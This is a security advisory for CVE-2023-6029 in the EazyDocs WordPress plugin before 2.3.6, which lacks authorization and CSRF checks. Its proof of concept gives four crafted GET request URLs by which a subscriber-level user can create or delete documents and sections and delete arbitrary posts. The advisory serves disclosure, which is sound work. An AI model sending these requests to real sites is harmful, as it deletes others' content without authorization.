EazyDocs < 2.3.6 – Subscriber+ Arbitrary Posts Deletion and Document Management | CVE 2023-6029

Description

The plugin does not have authorization and CSRF checks when handling documents and does not ensure that they are documents from the plugin, allowing any authenticated users, such as subscriber to delete arbitrary posts, as well as add and delete documents/sections.

Proof of Concept

1. Install the EazyDocs plugin
2. Log in as Subscriber
3. Make GET requests:
- To add a document : https://example.com/wp-admin/admin-post.php?Create_doc=yes&parent_title=doc%201
- To delete a post/document : https://example.com/wp-admin/admin-post.php?Doc_Delete=yes&DeleteID=12
- To add a section : https://example.com/wp-admin/admin-post.php?Create_Section=yes&parentID=90&is_section=sec%201
- To delete a section: https://example.com/wp-admin/admin-post.php?Section_Delete=yes&ID=110

When making requests, the page will redirect to the login page but the action is still completed, log in as Admin to check the result.